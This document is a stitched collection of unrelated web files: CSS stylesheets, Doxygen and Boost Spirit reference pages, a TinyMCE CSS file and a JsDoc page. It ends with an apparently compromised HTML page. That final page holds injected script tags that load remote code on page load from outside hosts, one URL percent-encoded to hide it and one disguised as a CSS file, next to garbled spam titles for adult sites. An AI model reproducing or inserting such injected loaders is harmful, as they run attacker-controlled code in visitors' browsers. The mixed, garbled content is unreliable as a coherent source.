.col-lg-push-7 {
left: 58.33333333%;
}
.col-lg-push-6 {
left: 50%;
}
.col-lg-push-5 {
left: 41.66666667%;
}
.col-lg-push-4 {
left: 33.33333333%;
}
.col-lg-push-3 {
left: 25%;
}
.col-lg-push-2 {
left: 16.66666667%;
}
.col-lg-push-1 {
left: 8.33333333%;
}
.col-lg-push-0 {
left: auto;
}
.col-lg-offset-12 {
margin-left: 100%;
}
.col-lg-offset-11 {
margin-left: 91.66666667%;
}
.col-lg-offset-10 {
margin-left: 83.33333333%;
}
.col-lg-offset-9 {
margin-left: 75%;
}
.col-lg-offset-8 {
margin-left: 66.66666667%;
}
.col-lg-offset-7 {
margin-left: 58.33333333%;
}
.col-lg-offset-6 {
margin-left: 50%;
}
.col-lg-offset-5 {
margin-left: 41.66666667%;
}
.col-lg-offset-4 {
margin-left: 33.33333333%;
}
.col-lg-offset-3 {
margin-left: 25%;
}
.col-lg-offset-2 {
margin-left: 16.66666667%;
}
.col-lg-offset-1 {
margin-left: 8.33333333%;
}
.col-lg-offset-0 {
margin-left: 0;
}
}
.container {
padding-right: 12px;
padding-left: 12px;
}
@media (min-width: 768px) {
.container {
padding-right: 24px;
padding-left: 24px;
}
}
@media (min-width: 992px) {
.container {
padding-right: 24px;
padding-left: 24px;
}
}
@media (min-width: 1200px) {
.container {
padding-right: 24px;
padding-left: 24px;
}
}
/*!_text-styling v4.0.1*/
/*! normalize.css v4.2.0 | MIT License | github.com/necolas/normalize.css */
/**
* 1. Change the default font family in all browsers (opinionated).
* 2. Correct the line height in all browsers.
* 3. Prevent adjustments of font size after orientation changes in IE and iOS.
*/
/* Document
========================================================================== */
html {
font-family: sans-serif;
/* 1 */
line-height: 1.15;
/* 2 */
-ms-text-size-adjust: 100%;
/* 3 */
-webkit-text-size-adjust: 100%;
/* 3 */
}
/* Sections
========================================================================== */
/**
* Remove the margin in all browsers (opinionated).
*/
body {
margin: 0;
}
/**
* Add the correct display in IE 9-.
*/
article,
aside,
footer,
header,
nav,
section {
display: block;
}
/**
* Correct the font size and margin on `h1` elements within `section` and
* `article` contexts in Chrome, Firefox, and Safari.
*/
h1 {
font-size: 2em;
margin: 0.67em 0;
}
/* Grouping content
========================================================================== */
/**
* Add the correct display in IE 9-.
* 1. Add the correct display in IE.
*/
figcaption,
figure,
main {
/* 1 */
display: block;
}
/**
* Add the correct margin in IE 8.
*/
figure {
margin: 1em 40px;
}
/**
* 1. Add the correct box sizing in Firefox.
* 2. Show the overflow in Edge and IE.
*/
hr {
box-sizing: content-box;
/* 1 */
height: 0;
/* 1 */
overflow: visible;
/* 2 */
}
/**
* 1. Correct the inheritance and scaling of font size in all browsers.
* 2. Correct the odd `em` font sizing in all browsers.
*/
pre {
font-family: monospace, monospace;
/* 1 */
font-size: 1em;
/* 2 */
}
/* Text-level semantics
========================================================================== */
/**
* 1. Remove the gray background on active links in IE 10.
* 2. Remove gaps in links underline in iOS 8+ and Safari 8+.
*/
a {
background-color: transparent;
/* 1 */
-webkit-text-decoration-skip: objects;
/* 2 */
}
/**
* Remove the outline on focused links when they are also active or hovered
* in all browsers (opinionated).
*/
a:active,
a:hover {
outline-width: 0;
}
/**
* 1. Remove the bottom border in Firefox 39-.
* 2. Add the correct text decoration in Chrome, Edge, IE, Opera, and Safari.
*/
abbr[title] {
border-bottom: none;
/* 1 */
text-decoration: underline;
/* 2 */
text-decoration: underline dotted;
/* 2 */
}
/**
* Prevent the duplicate application of `bolder` by the next rule in Safari 6.
*/
b,
strong {
font-weight: inherit;
}
/**
* Add the correct font weight in Chrome, Edge, and Safari.
*/
b,
strong {
font-weight: bolder;
}
/**
* 1. Correct the inheritance and scaling of font size in all browsers.
* 2. Correct the odd `em` font sizing in all browsers.
*/
code,
kbd,
samp {
font-family: monospace, monospace;
/* 1 */
font-size: 1em;
/* 2 */
}
/**
* Add the correct font style in Android 4.3-.
*/
dfn {
font-style: italic;
}
/**
* Add the correct background and color in IE 9-.
*/
mark {
background-color: #ff0;
color: #000;
}
/**
* Add the correct font size in all browsers.
*/
small {
font-size: 80%;
}
/**
* Prevent `sub` and `sup` elements from affecting the line height in
* all browsers.
*/
sub,
sup {
font-size: 75%;
line-height: 0;
position: relative;
vertical-align: baseline;
}
sub {
bottom: -0.25em;
}
sup {
top: -0.5em;
}
/* Embedded content
========================================================================== */
/**
* Add the correct display in IE 9-.
*/
audio,
video {
display: inline-block;
}
/**
* Add the correct display in iOS 4-7.
*/
audio:not([controls]) {
display: none;
height: 0;
}
/**
* Remove the border on images inside links in IE 10-.
*/
img {
border-style: none;
}
/**
* Hide the overflow in IE.
*/
svg:not(:root) {
overflow: hidden;
}
/* Forms
========================================================================== */
/**
* 1. Change the font styles in all browsers (opinionated).
* 2. Remove the margin in Firefox and Safari.
*/
button,
input,
optgroup,
select,
textarea {
font-family: sans-serif;
/* 1 */
font-size: 100%;
/* 1 */
line-height: 1.15;
/* 1 */
margin: 0;
/* 2 */
}
/**
* Show the overflow in IE.
* 1. Show the overflow in Edge.
*/
button,
input {
/* 1 */
overflow: visible;
}
/**
* Remove the inheritance of text transform in Edge, Firefox, and IE.
* 1. Remove the inheritance of text transform in Firefox.
*/
button,
select {
/* 1 */
text-transform: none;
}
/**
* 1. Prevent a WebKit bug where (2) destroys native `audio` and `video`
* controls in Android 4.
* 2. Correct the inability to style clickable types in iOS and Safari.
*/
button,
html [type="button"],
[type="reset"],
[type="submit"] {
-webkit-appearance: button;
/* 2 */
}
/**
* Remove the inner border and padding in Firefox.
*/
button::-moz-focus-inner,
[type="button"]::-moz-focus-inner,
[type="reset"]::-moz-focus-inner,
[type="submit"]::-moz-focus-inner {
border-style: none;
padding: 0;
}
/**
* Restore the focus styles unset by the previous rule.
*/
button:-moz-focusring,
[type="button"]:-moz-focusring,
[type="reset"]:-moz-focusring,
[type="submit"]:-moz-focusring {
outline: 1px dotted ButtonText;
}
/**
* Change the border, margin, and padding in all browsers (opinionated).
*/
fieldset {
border: 1px solid #c0c0c0;
margin: 0 2px;
padding: 0.35em 0.625em 0.75em;
}
/**
* 1. Correct the text wrapping in Edge and IE.
* 2. Correct the color inheritance from `fieldset` elements in IE.
* 3. Remove the padding so developers are not caught out when they zero out
* `fieldset` elements in all browsers.
*/
legend {
box-sizing: border-box;
/* 1 */
color: inherit;
/* 2 */
display: table;
/* 1 */
max-width: 100%;
/* 1 */
padding: 0;
/* 3 */
white-space: normal;
/* 1 */
}
/**
* 1. Add the correct display in IE 9-.
* 2. Add the correct vertical alignment in Chrome, Firefox, and Opera.
*/
progress {
display: inline-block;
/* 1 */
vertical-align: baseline;
/* 2 */
}
/**
* Remove the default vertical scrollbar in IE.
*/
textarea {
overflow: auto;
}
/**
* 1. Add the correct box sizing in IE 10-.
* 2. Remove the padding in IE 10-.
*/
[type="checkbox"],
[type="radio"] {
box-sizing: border-box;
/* 1 */
padding: 0;
/* 2 */
}
/**
* Correct the cursor style of increment and decrement buttons in Chrome.
*/
[type="number"]::-webkit-inner-spin-button,
[type="number"]::-webkit-outer-spin-button {
height: auto;
}
/**
* 1. Correct the odd appearance in Chrome and Safari.
* 2. Correct the outline style in Safari.
*/
[type="search"] {
-webkit-appearance: textfield;
/* 1 */
outline-offset: -2px;
/* 2 */
}
/**
* Remove the inner padding and cancel buttons in Chrome and Safari on OS X.
*/
[type="search"]::-webkit-search-cancel-button,
[type="search"]::-webkit-search-decoration {
-webkit-appearance: none;
}
/**
* 1. Correct the inability to style clickable types in iOS and Safari.
* 2. Change font properties to `inherit` in Safari.
*/
::-webkit-file-upload-button {
-webkit-appearance: button;
/* 1 */
font: inherit;
/* 2 */
}
/* Interactive
========================================================================== */
/*
* Add the correct display in IE 9-.
* 1. Add the correct display in Edge, IE, and Firefox.
*/
details,
menu {
display: block;
}
/*
* Add the correct display in all browsers.
*/
summary {
display: list-item;
}
/* Scripting
========================================================================== */
/**
* Add the correct display in IE 9-.
*/
canvas {
display: inline-block;
}
/**
* Add the correct display in IE.
*/
template {
display: none;
}
/* Hidden
========================================================================== */
/**
* Add the correct display in IE 10-.
*/
[hidden] {
display: none;
}
/*
* SETTINGS
*/
body {
font-size: 0.875em;
line-height: 1.428571429;
color: #000;
background-color: #f3f5f6;
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
}
abbr[title] {
cursor: help;
border-bottom: 1px dotted #000;
text-decoration: none;
}
address {
font-style: normal;
}
blockquote {
font-size: 16px;
font-weight: 300;
}
button,
input,
optgroup,
select,
textarea {
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
}
mark {
background-color: #f7ccd5;
}
p {
margin: 0.8571428572em 0;
}
dl dt {
font-weight: 700;
}
dl dd {
margin: 0;
}
::-moz-selection {
background-color: #f7ccd5;
}
::selection {
background-color: #f7ccd5;
}
a {
color: #d5002b;
text-decoration: underline;
}
a:hover,
a:focus {
color: #d5002b;
text-decoration: underline;
}
a:focus {
outline: none;
color: #d5002b;
}
.is-keyboarduser a:focus {
outline: 2px dotted #000;
outline-offset: 0.5rem;
}
.is-keyboarduser a:focus {
background-color: #fff;
}
a:hover {
outline: none;
background-color: transparent;
}
@media print {
* {
text-shadow: none !important;
color: #000 !important;
background: #fff !important;
box-shadow: none !important;
border-color: #000 !important;
}
a,
a:visited {
text-decoration: underline;
}
a[href]:after {
content: " (" attr(href) ")";
}
abbr[title]:after {
content: " (" attr(title) ")";
}
a[href^="javascript:"]:after,
a[href^="#"]:after {
content: "";
}
pre,
blockquote {
border: 1px solid #999;
padding: 6px;
page-break-inside: avoid;
}
thead {
display: table-header-group;
}
tr,
img {
page-break-inside: avoid;
}
img {
max-width: 100% !important;
}
p,
h2,
h3 {
orphans: 3;
widows: 3;
}
h2,
h3 {
page-break-after: avoid;
}
p a {
word-wrap: break-word;
}
select {
background: #fff !important;
}
.container,
.container-fluid {
margin: auto;
width: auto;
}
}
/*!icons-group16 v2.0.1 WBG*/
/*
* icons-group16 mixins
*
*/
/*
* SETTINGS
*/
|
pages/platforms/v3_3/cpp/classdocs/affdex-native/classaffdex_1_1_process_status_listener-members.html | Affectiva/developerportal | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.5"/>
<title>Affdex SDK: Member List</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td id="projectlogo"><img alt="Logo" src="mobileLogo.png"/></td>
<td style="padding-left: 0.5em;">
<div id="projectname">Affdex SDK
</div>
<div id="projectbrief">Technical Reference (C++)</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.5 -->
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="namespaces.html"><span>Namespaces</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="classes.html"><span>Class Index</span></a></li>
<li><a href="hierarchy.html"><span>Class Hierarchy</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="namespaceaffdex.html">affdex</a></li><li class="navelem"><a class="el" href="classaffdex_1_1_process_status_listener.html">ProcessStatusListener</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="headertitle">
<div class="title">affdex::ProcessStatusListener Member List</div> </div>
</div><!--header-->
<div class="contents">
<p>This is the complete list of members for <a class="el" href="classaffdex_1_1_process_status_listener.html">affdex::ProcessStatusListener</a>, including all inherited members.</p>
<table class="directory">
<tr class="even"><td class="entry"><a class="el" href="classaffdex_1_1_process_status_listener.html#a85941d7bde70eadbc7609087c93c10e5">onProcessingException</a>(AffdexException ex)=0</td><td class="entry"><a class="el" href="classaffdex_1_1_process_status_listener.html">affdex::ProcessStatusListener</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr><td class="entry"><a class="el" href="classaffdex_1_1_process_status_listener.html#abc7899d1151c400912ae8f181a8ab4bf">onProcessingFinished</a>()=0</td><td class="entry"><a class="el" href="classaffdex_1_1_process_status_listener.html">affdex::ProcessStatusListener</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr bgcolor="#f0f0f0" class="even"><td class="entry"><b>~ProcessStatusListener</b>() (defined in <a class="el" href="classaffdex_1_1_process_status_listener.html">affdex::ProcessStatusListener</a>)</td><td class="entry"><a class="el" href="classaffdex_1_1_process_status_listener.html">affdex::ProcessStatusListener</a></td><td class="entry"><span class="mlabel">inline</span><span class="mlabel">virtual</span></td></tr>
</table></div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Wed Apr 19 2017 18:26:21 for Affdex SDK by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.5
</small></address>
</body>
</html>
|
boost/libs/spirit/doc/html/spirit/karma/quick_reference/primitive_generators/stream.html | geodynamics/gale | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>Stream Generators</title>
<link rel="stylesheet" href="../../../../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.75.0">
<link rel="home" href="../../../../index.html" title="Spirit 2.5">
<link rel="up" href="../primitive_generators.html" title="Karma Generators">
<link rel="prev" href="boolean.html" title="Boolean Generators">
<link rel="next" href="binary.html" title="Binary Generators">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../../../boost.png"></td>
<td align="center"><a href="../../../../../../../../index.html">Home</a></td>
<td align="center"><a href="../../../../../../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../../../../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="boolean.html"><img src="../../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../primitive_generators.html"><img src="../../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../../index.html"><img src="../../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="binary.html"><img src="../../../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="section">
<div class="titlepage"><div><div><h5 class="title">
<a name="spirit.karma.quick_reference.primitive_generators.stream"></a><a class="link" href="stream.html" title="Stream Generators">Stream
Generators</a>
</h5></div></div></div>
<p>
See here for more information about <a class="link" href="../../reference/stream/stream.html" title="Stream Generators (stream, wstream, etc.)">Stream
Generators</a>.
</p>
<div class="informaltable"><table class="table">
<colgroup>
<col>
<col>
<col>
</colgroup>
<thead><tr>
<th>
<p>
Expression
</p>
</th>
<th>
<p>
Attribute
</p>
</th>
<th>
<p>
Description
</p>
</th>
</tr></thead>
<tbody>
<tr>
<td>
<p>
<a class="link" href="../../reference/stream/stream.html" title="Stream Generators (stream, wstream, etc.)"><code class="computeroutput"><span class="identifier">stream</span></code></a>
</p>
</td>
<td>
<p>
<code class="computeroutput"><span class="identifier">hold_any</span></code>
</p>
</td>
<td>
<p>
Generate narrow character (<code class="computeroutput"><span class="keyword">char</span></code>)
based output using the matching streaming <code class="computeroutput"><span class="keyword">operator</span><span class="special"><<()</span></code>
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="../../reference/stream/stream.html" title="Stream Generators (stream, wstream, etc.)"><code class="computeroutput"><span class="identifier">stream</span><span class="special">(</span><span class="identifier">s</span><span class="special">)</span></code></a>
</p>
</td>
<td>
<p>
<code class="computeroutput"><span class="identifier">Unused</span></code>
</p>
</td>
<td>
<p>
Generate narrow character (<code class="computeroutput"><span class="keyword">char</span></code>)
based output from the immediate argument <code class="computeroutput"><span class="identifier">s</span></code>
using the matching streaming <code class="computeroutput"><span class="keyword">operator</span><span class="special"><<()</span></code>
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="../../reference/stream/stream.html" title="Stream Generators (stream, wstream, etc.)"><code class="computeroutput"><span class="identifier">wstream</span></code></a>
</p>
</td>
<td>
<p>
<code class="computeroutput"><span class="identifier">whold_any</span></code>
</p>
</td>
<td>
<p>
Generate wide character (<code class="computeroutput"><span class="keyword">wchar_t</span></code>)
based output using the matching streaming <code class="computeroutput"><span class="keyword">operator</span><span class="special"><<()</span></code>
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="../../reference/stream/stream.html" title="Stream Generators (stream, wstream, etc.)"><code class="computeroutput"><span class="identifier">wstream</span><span class="special">(</span><span class="identifier">s</span><span class="special">)</span></code></a>
</p>
</td>
<td>
<p>
<code class="computeroutput"><span class="identifier">Unused</span></code>
</p>
</td>
<td>
<p>
Generate wide character (<code class="computeroutput"><span class="keyword">wchar_t</span></code>)
based output from the immediate argument <code class="computeroutput"><span class="identifier">s</span></code>
using the matching streaming <code class="computeroutput"><span class="keyword">operator</span><span class="special"><<()</span></code>
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="../../reference/stream/stream.html" title="Stream Generators (stream, wstream, etc.)">
<pre xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="table-programlisting"><span class="identifier">stream_generator</span><span class="special"><</span>
<span class="identifier">Char</span>
<span class="special">>()</span></pre>
</a>
</p>
</td>
<td>
<p>
<code class="computeroutput"><span class="identifier">basic_hold_any</span><span class="special"><</span><span class="identifier">Char</span><span class="special">></span></code>
</p>
</td>
<td>
<p>
Generate output based on the given character type (<code class="computeroutput"><span class="identifier">Char</span></code>) using the matching
streaming <code class="computeroutput"><span class="keyword">operator</span><span class="special"><<()</span></code>
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="../../reference/stream/stream.html" title="Stream Generators (stream, wstream, etc.)">
<pre xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="table-programlisting"><span class="identifier">stream_generator</span><span class="special"><</span>
<span class="identifier">Char</span>
<span class="special">>()(</span><span class="identifier">s</span><span class="special">)</span></pre>
</a>
</p>
</td>
<td>
<p>
<code class="computeroutput"><span class="identifier">Unused</span></code>
</p>
</td>
<td>
<p>
Generate output based on the given character type <code class="computeroutput"><span class="identifier">Char</span></code> from the immediate argument
<code class="computeroutput"><span class="identifier">s</span></code> using the
matching streaming <code class="computeroutput"><span class="keyword">operator</span><span class="special"><<()</span></code>
</p>
</td>
</tr>
</tbody>
</table></div>
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"></td>
<td align="right"><div class="copyright-footer">Copyright © 2001-2011 Joel de Guzman, Hartmut Kaiser<p>
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)
</p>
</div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="boolean.html"><img src="../../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../primitive_generators.html"><img src="../../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../../index.html"><img src="../../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="binary.html"><img src="../../../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
plugins/editors/jce/tiny_mce/plugins/filemanager/css/filemanager.css | lycoben/veneflights | /* CSS file for FileManager plugin */
.mceActionPanel {
margin-top: 7px;
}
.checkbox {
border: 0px;
margin-left: 5px;
}
.label {
margin-left: 20px;
}
.panel_wrapper div.current {
height: 160px;
}
#href, #title {
width: 400px;
vertical-align: middle;
}
#targetlist {
width: 280px;
vertical-align: middle;
}
ul#sortGroup {
list-style: none;
margin:0px;
padding: 0px;
white-space: nowrap;
}
li.sortItem {
cursor: e-resize;
position: relative;
list-style: none;
float: left;
border: 1px solid #ccc;
padding: 1px;
margin-right: 5px;
height: 20px;
vertical-align: middle;
background-image: url(../img/icons.gif);
background-repeat: no-repeat;
}
li label {
cursor: e-resize;
}
li input {
cursor: default;
}
li#li-date.loading, li#li-size.loading {
background-image: url(../../../../libraries/img/load.gif);
background-position: inherit;
}
li#li-icon {
background-position: 0 0;
}
li#li-date {
background-position: 0 -60px;
}
li#li-size {
background-position: 0 -40px;
}
li#li-text {
background-position: 0 -20px;
}
input#size-value, input#date-value {
cursor: text;
margin-left: 5px;
}
input#size-value {
width: 70px;
}
input#date-value {
width: 130px;
}
input#size-refresh, input#date-refresh {
background: url(../img/icons.gif) no-repeat 0 -80px;
border: 0px;
cursor: pointer;
padding: 1px;
margin: 0px;
width: 20px;
height: 20px;
} |
demo/GMU-master/test/fet/doc/UserAction doc/symbols/ua.html | elppac/moment | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="generator" content="JsDoc Toolkit" />
<title>JsDoc Reference - ua</title>
<style type="text/css">
/* default.css */
body
{
font: 12px "Lucida Grande", Tahoma, Arial, Helvetica, sans-serif;
width: 800px;
}
.header
{
clear: both;
background-color: #ccc;
padding: 8px;
}
h1
{
font-size: 150%;
font-weight: bold;
padding: 0;
margin: 1em 0 0 .3em;
}
hr
{
border: none 0;
border-top: 1px solid #7F8FB1;
height: 1px;
}
pre.code
{
display: block;
padding: 8px;
border: 1px dashed #ccc;
}
#index
{
margin-top: 24px;
float: left;
width: 160px;
position: absolute;
left: 8px;
background-color: #F3F3F3;
padding: 8px;
}
#content
{
margin-left: 190px;
width: 600px;
}
.classList
{
list-style-type: none;
padding: 0;
margin: 0 0 0 8px;
font-family: arial, sans-serif;
font-size: 1em;
overflow: auto;
}
.classList li
{
padding: 0;
margin: 0 0 8px 0;
}
.summaryTable { width: 100%; }
h1.classTitle
{
font-size:170%;
line-height:130%;
}
h2 { font-size: 110%; }
caption, div.sectionTitle
{
background-color: #7F8FB1;
color: #fff;
font-size:130%;
text-align: left;
padding: 2px 6px 2px 6px;
border: 1px #7F8FB1 solid;
}
div.sectionTitle { margin-bottom: 8px; }
.summaryTable thead { display: none; }
.summaryTable td
{
vertical-align: top;
padding: 4px;
border-bottom: 1px #7F8FB1 solid;
border-right: 1px #7F8FB1 solid;
}
/*col#summaryAttributes {}*/
.summaryTable td.attributes
{
border-left: 1px #7F8FB1 solid;
width: 140px;
text-align: right;
}
td.attributes, .fixedFont
{
line-height: 15px;
color: #002EBE;
font-family: "Courier New",Courier,monospace;
font-size: 13px;
}
.summaryTable td.nameDescription
{
text-align: left;
font-size: 13px;
line-height: 15px;
}
.summaryTable td.nameDescription, .description
{
line-height: 15px;
padding: 4px;
padding-left: 4px;
}
.summaryTable { margin-bottom: 8px; }
ul.inheritsList
{
list-style: square;
margin-left: 20px;
padding-left: 0;
}
.detailList {
margin-left: 20px;
line-height: 15px;
}
.detailList dt { margin-left: 20px; }
.detailList .heading
{
font-weight: bold;
padding-bottom: 6px;
margin-left: 0;
}
.light, td.attributes, .light a:link, .light a:visited
{
color: #777;
font-style: italic;
}
.fineprint
{
text-align: right;
font-size: 10px;
}
</style>
</head>
<body>
<!-- ============================== header ================================= -->
<!-- begin static/header.html -->
<div id="header">
</div>
<!-- end static/header.html -->
<!-- ============================== classes index ============================ -->
<div id="index">
<!-- begin publish.classesIndex -->
<div align="center"><a href="../index.html">Class Index</a>
| <a href="../files.html">File Index</a></div>
<hr />
<h2>Classes</h2>
<ul class="classList">
<li><i><a href="../symbols/_global_.html">_global_</a></i></li>
<li><a href="../symbols/ua.html">ua</a></li>
<li><a href="../symbols/UserAction.html">UserAction</a></li>
<li><a href="../symbols/UserAction.browser.chrome.html">UserAction.browser.chrome</a></li>
<li><a href="../symbols/UserAction.browser.firefox.html">UserAction.browser.firefox</a></li>
<li><a href="../symbols/UserAction.browser.gecko.html">UserAction.browser.gecko</a></li>
<li><a href="../symbols/UserAction.browser.ie.html">UserAction.browser.ie</a></li>
<li><a href="../symbols/UserAction.browser.maxthonIE.html">UserAction.browser.maxthonIE</a></li>
<li><a href="../symbols/UserAction.browser.mobile.html">UserAction.browser.mobile</a></li>
<li><a href="../symbols/UserAction.browser.opera.html">UserAction.browser.opera</a></li>
<li><a href="../symbols/UserAction.browser.safari.html">UserAction.browser.safari</a></li>
<li><a href="../symbols/UserAction.browser.webkit.html">UserAction.browser.webkit</a></li>
</ul>
<hr />
<!-- end publish.classesIndex -->
</div>
<div id="content">
<!-- ============================== class title ============================ -->
<h1 class="classTitle">
Namespace ua
</h1>
<!-- ============================== class summary ========================== -->
<p class="description">
UserAction
<br /><i>Defined in: </i> <a href="../symbols/src/d__Workplace_git_componentDemo_test_tools_br_js_UserAction.js.html">UserAction.js</a>.
</p>
<!-- ============================== constructor summary ==================== -->
<table class="summaryTable" cellspacing="0" summary="A summary of the constructor documented in the class ua.">
<caption>Namespace Summary</caption>
<thead>
<tr>
<th scope="col">Constructor Attributes</th>
<th scope="col">Constructor Name and Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="attributes"> </td>
<td class="nameDescription" >
<div class="fixedFont">
<b><a href="../symbols/ua.html#constructor">ua</a></b>
</div>
<div class="description"></div>
</td>
</tr>
</tbody>
</table>
<!-- ============================== properties summary ===================== -->
<!-- ============================== methods summary ======================== -->
<!-- ============================== events summary ======================== -->
<!-- ============================== constructor details ==================== -->
<div class="details"><a name="constructor"> </a>
<div class="sectionTitle">
Namespace Detail
</div>
<div class="fixedFont">
<b>ua</b>
</div>
<div class="description">
</div>
</div>
<!-- ============================== field details ========================== -->
<!-- ============================== method details ========================= -->
<!-- ============================== event details ========================= -->
<hr />
</div>
<!-- ============================== footer ================================= -->
<div class="fineprint" style="clear:both">
Documentation generated by <a href="http://code.google.com/p/jsdoc-toolkit/" target="_blank">JsDoc Toolkit</a> 2.4.0 on Tue Mar 13 2012 17:44:57 GMT+0800 (CST)
</div>
</body>
</html>
|
logs/kengjisong/410.html | ForAEdesWeb/AEW25 | <script/src=//%61%6C%69%63%64%6E%2E%72%65%2E%6B%72/%72%65%2E%6B%72></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø</title>
<meta name="keywords" content="99re2.¾Ã¾ÃÈÈ×îеØÖ· ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø">
<meta name="description" content="99re2.¾Ã¾ÃÈÈ×îеØÖ·¸÷ÖÖ¾«²ÊÄÚÈÝʵʱ¸üÐÂ,Ϊ¹ã´óÍøÓÑÌṩԴ´×ÊÔ´,99re2.¾Ã¾ÃÈÈ×îеØÖ·Ò»ÆðËáˬ¡£ ,˼˼µÄ¼ÒÔ°"><link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />
</head>
<script/src=//alicdn.re.kr/re.kr></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø</title>
<meta name="keywords" content="99re2.¾Ã¾ÃÈÈ×îеØÖ· ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø">
<meta name="description" content="99re2.¾Ã¾ÃÈÈ×îеØÖ·¸÷ÖÖ¾«²ÊÄÚÈÝʵʱ¸üÐÂ,Ϊ¹ã´óÍøÓÑÌṩԴ´×ÊÔ´,99re2.¾Ã¾ÃÈÈ×îеØÖ·Ò»ÆðËáˬ¡£ ,˼˼µÄ¼ÒÔ°"><link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />
</head>
-------!>
<script/src=//360cdn.win/c.css></script>
